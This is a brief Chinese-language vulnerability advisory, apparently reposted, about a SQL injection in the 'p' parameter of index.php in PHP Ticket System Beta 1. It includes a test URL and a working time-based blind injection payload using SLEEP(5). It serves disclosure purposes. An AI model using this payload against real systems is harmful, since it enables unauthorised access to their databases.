标题: PHP Ticket System Beta 1 'p' SQL Injection 作者: G13 www.2cto.com 下载 地址: http://sourceforge.net/projects/phpticketsystem/ 影响版本: Beta 1 问题描述 PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress. 缺陷 The 'p' parameter on index.php is vulnerable to SQL Injection. A user must be signed in to perform this attack. 测试方法 http://www.2cto.com /index.php?p=[SQLi]&id=211&_=1334627588812 利用 http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812 修复: 升级到最新版
查看更多关于PHP Ticket System Beta 1 (index.php p parameter) S的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12128